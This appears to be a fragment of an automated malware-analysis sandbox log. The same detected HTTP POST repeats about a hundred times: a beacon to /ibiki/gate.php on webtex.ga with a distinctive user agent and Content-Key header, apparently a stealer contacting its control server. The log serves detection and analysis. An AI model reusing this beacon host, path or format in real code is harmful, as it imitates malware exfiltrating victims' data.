              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
